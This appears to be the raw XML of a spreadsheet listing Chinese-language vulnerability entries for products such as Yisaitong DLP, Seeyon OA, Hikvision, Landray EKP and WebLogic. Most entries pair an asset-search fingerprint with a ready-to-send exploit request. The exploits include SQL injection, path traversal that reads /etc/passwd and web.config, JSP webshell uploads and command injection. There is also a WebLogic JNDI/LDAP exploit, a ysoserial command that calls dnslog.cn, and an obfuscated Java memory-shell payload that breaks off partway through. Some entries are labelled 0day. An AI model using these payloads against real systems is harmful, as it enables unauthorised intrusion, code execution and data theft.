    <t>/webui/?g=aaa_portal_auth_adv_submit&amp;tab_name=广告模板&amp;welcome_word=广告模板&amp;btn_color=337ab7&amp;suffix=%7Burlenc(%60id+%3E/usr/local/webui/test.txt%60)%7D&amp;bkg_flag=0&amp;check_btn_color=&amp;des=undefined</t>
  </si>
  <si>
    <t>润乾报表前台任意文件上传漏洞(0day)</t>
  </si>
  <si>
    <t>PoST /InputServlet?action=12 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac os x 10 15 7)AppleWebKit/537.36(KHTML,like Gecko)chrome/93.0.4577.63 Safari/537.36Content-Type: multipart/form-data; boundary=00contenteboundary80Host:
Accept:text/html,image/gif,image/jpeg,*;q=.2，*/*;q=.2Content-Length:241
Connection:close
--00content0boundary00
Content-Disposition:form-data;name="upsize"
1024
--00contentGboundary00
Content-Disposition:form-data;name="file";filename="/\..\..\\..\2211.jsp"
Content-Type:image/jpeg
123
--00contentaboundary00--</t>
  </si>
  <si>
    <t>通天星 CMSV6 车载视频监控平台 disable 存在 SQL 注入</t>
  </si>
  <si>
    <t>body="./open/webApi.html"</t>
  </si>
  <si>
    <t>GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:</t>
  </si>
  <si>
    <t>亿赛通数据泄露防护(DLP)系统 NetSecConfigAjax SQL 注入</t>
  </si>
  <si>
    <t>app="亿赛通-DLP"</t>
  </si>
  <si>
    <t>POST/CDGServer3/NetSecConfigAjax;ServiceHTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&amp;state=123';if (selectIS_SRVROLEMEMBER('sysadmin'))=1WAITFORDELAY'0:0:5'-</t>
  </si>
  <si>
    <t>亿赛通数据泄露防护(DLP)系统 NoticeAjax SQL 注入</t>
  </si>
  <si>
    <t>POST /CDGServer3/NoticeAjax;Service HTTP/1.1
Host: ip:8443
Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Priority: u=0, i
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
command=delNotice&amp;noticeId=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--</t>
  </si>
  <si>
    <t>天问物业 ERP 系统 AreaAvatarDownLoad.aspx 任意文件读取</t>
  </si>
  <si>
    <t>GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36</t>
  </si>
  <si>
    <t>启明星辰 天玥网络安全审计系统 SQL 注入</t>
  </si>
  <si>
    <t>python sqlmap.py -u "https://ip/ops/index.php?c =Reportguide&amp;a =check rn"
--data "check name =123&amp;tagid =123" --skip-waf --random-agent --dbs --batch --force-ssl</t>
  </si>
  <si>
    <t>锐捷 RG-NBS2026G-P 交换机WEB管理 ping.htm 未授权 访问漏洞</t>
  </si>
  <si>
    <t>访问接口/safety/ping.htm</t>
  </si>
  <si>
    <t>福建科立讯通信 指挥调度管理平台 ajax_users.php 信息泄露</t>
  </si>
  <si>
    <t>/app/ext/ajax_users.php</t>
  </si>
  <si>
    <t>帆软反序列化新链（0day）</t>
  </si>
  <si>
    <t>致远 OA fileUpload.do 前台文件上传绕过漏洞</t>
  </si>
  <si>
    <t>POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=00content0boundary00 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)
Content-Length: 754
--00content0boundary00 
Content-Disposition: form-data; name="type"
--00content0boundary00
Content-Disposition: form-data; name="extensions"
png
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00
Content-Disposition: form-data; name="destDirectory"
--00content0boundary00
Content-Disposition: form-data; name="destFilename"
--00content0boundary00
Content-Disposition: form-data; name="maxSize"
--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"
false
--00content0boundary00
Content-Disposition: form-data; name="file1"; filename="1.png" Content-Type: Content-Type: application/pdf
&lt;% out.println("hello");%&gt; 
--00content0boundary00--
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1 
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506) 
Content-Length: 64
method=uploadMenuIcon&amp;fileid=ID 值&amp;filename=qwe.jsp</t>
  </si>
  <si>
    <t>万户 OA SQL 注入漏洞</t>
  </si>
  <si>
    <t>python sqlmap.py -u "http://xxxxxxxxx/defaultroot/public/iWebOfficeSign/DocumentEdit_unite.jsp;?RecordID=1" --level 3 --dbs</t>
  </si>
  <si>
    <t>数字通指尖云平台-智慧政务payslip SQL注入</t>
  </si>
  <si>
    <t>GET /payslip/search/index/userid/time/time?PayslipUser[user_id]=SELECT 4050
FROM(SELECT COUNT(*),CONCAT((mid((ifnul1(cast(current_user() as nchar),0x2
0)),1,54)),FLOOR(RAND(0*2))x FROM INFORMATION_SCHEMA,PLUGINS GROUP BY X)a)  HTTP/1.1
Host:xx.xx.xx.x
User-Agent: Mozilla/5,0 (Macintosh; Intel Mac S X 10,15; rv:109,0) Gecko/201
00101 Firefox/117.9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,imag
e/webp,*/*;q=8.8
Accept-Language: zh-CN,zh;q=0.8,zh-Tw;g=0.7,zh-HK;g-0.5,en-US;g=0.3,en;g-0.2
Accept-Encoding: gzip，deflate
Connection: close
Cookie: GOASESSID=i589f58naalabocmbidup7edl3
Upgrade-Insecure-Requests: 1</t>
  </si>
  <si>
    <t>福建科立讯通信 指挥调度管理平台 ajax_users.php SQL 注入漏洞</t>
  </si>
  <si>
    <t>POST /app/ext/ajax_users.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -</t>
  </si>
  <si>
    <t>福建科立讯通信 指挥调度管理平台存在远程命令执行漏洞</t>
  </si>
  <si>
    <t>GET /api/client/audiobroadcast/invite_one_member.php?callee=1&amp;roomid=%60ech o%20test%3Etest.txt%60 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive</t>
  </si>
  <si>
    <t>用友 U8 cloud MonitorServlet 反序列化漏洞</t>
  </si>
  <si>
    <t>java -jar ysoserial.jar CommonsCollections6 "ping dnslog.cn" &gt; obj.ser
POST /service/~iufo/nc.bs.framework.mx.monitor.MonitorServlet HTTP/1.1 
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
payload</t>
  </si>
  <si>
    <t>海康威视综合安防管理平台 前台RCE(老洞)</t>
  </si>
  <si>
    <t>POST /center/api/installation/detection HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36(KHTML, like Gecko) Chrome/105.0.1249.139 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=UTF-8
{"type":"environment","operate":"","machines":{"id":  "$(id &gt; /opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/echo.txt)"}}
访问/vms/static/echo.txt</t>
  </si>
  <si>
    <t>WebLogic远程代码执行漏洞(CVE-2024-21006)</t>
  </si>
  <si>
    <t>package org.example;
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Hashtable;
public class MessageDestinationReference {
    public static void main(String[] args) throws Exception {
        String ip = "192.168.31.69";
        String port = "7001";
//        String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
        String rhost = String.format("iiop://%s:%s", ip, port);
        Hashtable&lt;String, String&gt; env = new Hashtable&lt;String, String&gt;();
        // add wlsserver/server/lib/weblogic.jar to classpath,else will error.
        env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
        env.put(Context.PROVIDER_URL, rhost);
        Context context = new InitialContext(env);
//        Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
        weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
            @Override
            public String[] getDescriptions() {
                return new String[0];
            }
            @Override
            public void addDescription(String s) {
            }
            @Override
            public void removeDescription(String s) {
            }
            @Override
            public void setDescriptions(String[] strings) {
            }
            @Override
            public String getMessageDestinationRefName() {
                return null;
            }
            @Override
            public void setMessageDestinationRefName(String s) {
            }
            @Override
            public String getMessageDestinationType() {
                return "weblogic.application.naming.MessageDestinationReference";
            }
            @Override
            public void setMessageDestinationType(String s) {
            }
            @Override
            public String getMessageDestinationUsage() {
                return null;
            }
            @Override
            public void setMessageDestinationUsage(String s) {
            }
            @Override
            public String getMessageDestinationLink() {
                return null;
            }
            @Override
            public void setMessageDestinationLink(String s) {
            }
            @Override
            public String getMappedName() {
                return null;
            }
            @Override
            public void setMappedName(String s) {
            }
            @Override
            public InjectionTargetBean[] getInjectionTargets() {
                return new InjectionTargetBean[0];
            }
            @Override
            public InjectionTargetBean createInjectionTarget() {
                return null;
            }
            @Override
            public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {
            }
            @Override
            public String getLookupName() {
                return null;
            }
            @Override
            public void setLookupName(String s) {
            }
            @Override
            public String getId() {
                return null;
            }
            @Override
            public void setId(String s) {
            }
        }, "ldap://127.0.0.1:1389/deserialJackson", null, null);
        context.bind("L0ne1y",messageDestinationReference);
        context.lookup("L0ne1y");
    }
}</t>
  </si>
  <si>
    <t>AnalyticsCloud分析云存在任意文件读取</t>
  </si>
  <si>
    <t>GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1</t>
  </si>
  <si>
    <t>广联达Linkworks ArchiveWebService XML实体注入漏洞</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>POST</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> /GB/LK/Document/ArchiveService/ArchiveWebService.asmx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ip</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"http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArchiveInfo"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Content-Length:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 2918</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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ?&gt;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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &lt;PostArchiveInfo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;archiveInfo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &gt;&amp;#x3c;&amp;#x21;&amp;#x44;&amp;#x4f;&amp;#x43;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x20;&amp;#x41;&amp;#x72;&amp;#x63;&amp;#x68;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x20;&amp;#x5b;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x21;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x49;&amp;#x54;&amp;#x59;&amp;#x20;&amp;#x73;&amp;#x65;&amp;#x63;&amp;#x72;&amp;#x65;&amp;#x74;&amp;#x20;&amp;#x53;&amp;#x59;&amp;#x53;&amp;#x54;&amp;#x45;&amp;#x4d;&amp;#x20;&amp;#x22;&amp;#x66;&amp;#x69;&amp;#x6c;&amp;#x65;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x2f;&amp;#x77;&amp;#x69;&amp;#x6e;&amp;#x64;&amp;#x6f;&amp;#x77;&amp;#x73;&amp;#x2f;&amp;#x77;&amp;#x69;&amp;#x6e;&amp;#x2e;&amp;#x69;&amp;#x6e;&amp;#x69;&amp;#x22;&amp;#x3e;&amp;#x0a;&amp;#x5d;&amp;#x3e;&amp;#x0a;&amp;#x0a;&amp;#x3c;&amp;#x41;&amp;#x72;&amp;#x63;&amp;#x68;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x41;&amp;#x72;&amp;#x63;&amp;#x68;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x49;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x55;&amp;#x70;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x65;&amp;#x72;&amp;#x49;&amp;#x44;&amp;#x3e;&amp;#x0a;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x0a;&amp;#x0a;&amp;#x0a;&amp;#x26;&amp;#x73;&amp;#x65;&amp;#x63;&amp;#x72;&amp;#x65;&amp;#x74;&amp;#x3b;&amp;#x0a;&amp;#x0a;&amp;#x0a;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x23;&amp;#x0a;&amp;#x3c;&amp;#x2f;&amp;#x55;&amp;#x70;&amp;#x6c;&amp;#x6f;&amp;#x61;&amp;#x64;&amp;#x65;&amp;#x72;&amp;#x49;&amp;#x44;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x2f;&amp;#x41;&amp;#x72;&amp;#x63;&amp;#x68;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x49;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x52;&amp;#x65;&amp;#x73;&amp;#x75;&amp;#x6c;&amp;#x74;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x4d;&amp;#x61;&amp;#x69;&amp;#x6e;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x3e;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x75;&amp;#x6d;&amp;#x65;&amp;#x6e;&amp;#x74;&amp;#x20;&amp;#x43;&amp;#x6f;&amp;#x6e;&amp;#x74;&amp;#x65;&amp;#x6e;&amp;#x74;&amp;#x3c;&amp;#x2f;&amp;#x4d;&amp;#x61;&amp;#x69;&amp;#x6e;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x2f;&amp;#x52;&amp;#x65;&amp;#x73;&amp;#x75;&amp;#x6c;&amp;#x74;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x49;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x54;&amp;#x79;&amp;#x70;&amp;#x65;&amp;#x49;&amp;#x44;&amp;#x3e;&amp;#x31;&amp;#x3c;&amp;#x2f;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x54;&amp;#x79;&amp;#x70;&amp;#x65;&amp;#x49;&amp;#x44;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x56;&amp;#x65;&amp;#x72;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x3e;&amp;#x31;&amp;#x2e;&amp;#x30;&amp;#x3c;&amp;#x2f;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x56;&amp;#x65;&amp;#x72;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x20;&amp;#x3c;&amp;#x2f;&amp;#x44;&amp;#x6f;&amp;#x63;&amp;#x49;&amp;#x6e;&amp;#x66;&amp;#x6f;&amp;#x3e;&amp;#x20;&amp;#x20;&amp;#x0a;&amp;#x3c;&amp;#x2f;&amp;#x41;&amp;#x72;&amp;#x63;&amp;#x68;&amp;#x69;&amp;#x76;&amp;#x65;&amp;#x3e;&lt;/archiveInfo&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;folderIdList&gt;string&lt;/folderIdList&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      &lt;platId&gt;string&lt;/platId&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
    &lt;/PostArchiveInfo&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
  &lt;/soap:Body&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
&lt;/soap:Envelope&gt;</t>
    </r>
  </si>
  <si>
    <t>润乾报表 dataSphereServlet 任意文件读取漏洞</t>
  </si>
  <si>
    <t>id: file_read
info:
  name: 润乾报表dataSphereServlet接口存在任意文件读取漏洞
  author: dingzhen
  severity: high
  description: ''
  tags: raqsoft
  metadata:
    max-request: 3
    hunter-query: 
    verified: true
http:
  - raw:
      - |
        POST /servlet/dataSphereServlet?action=11 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        DNT: 1
        Sec-GPC: 1
        Connection: close
        sec-ch-ua-platform: "macOS"
        sec-ch-ua: "Google Chrome";v="118", "Chromium";v="118", "Not=A?Brand";v="24"
        sec-ch-ua-mobile: ?0
        Content-Length: 63
        Content-Type: application/x-www-form-urlencoded
        path=../../../../../../../../../../../etc/passwd&amp;content=&amp;mode=
    matchers:
      - type: dsl
        dsl:
          - 'status_code==200 &amp;&amp; contains(body,"root:")'</t>
  </si>
  <si>
    <t>泛微 e-cology 任意文件写入（0day）</t>
  </si>
  <si>
    <t>Bazarr swaggerui组件 目录穿越导致任意文件读取漏洞</t>
  </si>
  <si>
    <t>/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>全息AI网络运维平台ajax_cloud_router_config.php存在命令执行</t>
  </si>
  <si>
    <t>"全息AI网络运维平台"</t>
  </si>
  <si>
    <t>POST /nmss/cloud/Ajax/ajax_cloud_router_config.php HTTP/1.1
host：127.0.0.1
ping_cmd=8.8.8.8|cat /etc/passwd&gt;1.txt</t>
  </si>
  <si>
    <t>蓝凌EKP存在sys_ui_component远程命令执行</t>
  </si>
  <si>
    <t>app="Landray-OA系统"</t>
  </si>
  <si>
    <t>请求1
GET /c6/JHSoft.Web.Users/UserList.aspx/?nodeid=1007%27%3BWAITFOR+DELAY+%270%3A0%3A0%27--
POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1
Host: 
Accept:application/json,text/javascript,*/*;q=0.01
Accept-Encoding:gzip,deflate
Accept-Language:zh-CN,zh;q=0.9,en;q=0.8
Connection:close
Content-Type:multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/83.0.4103.116Safari/537.36
X-Requested-With:XMLHttpRequest
Content-Length: 395
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="method"
replaceExtend
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="extendId"
../../../../resource/help/km/review/
------WebKitFormBoundaryL7ILSpOdIhIIvL51
Content-Disposition:form-data;name="folderName"
../../../ekp/sys/common
------WebKitFormBoundaryL7ILSpOdIhIIvL51--
请求2
POST /resource/help/km/review/dataxml.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Cmd: echo stctest
s_bean=ruleFormulaValidate&amp;script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\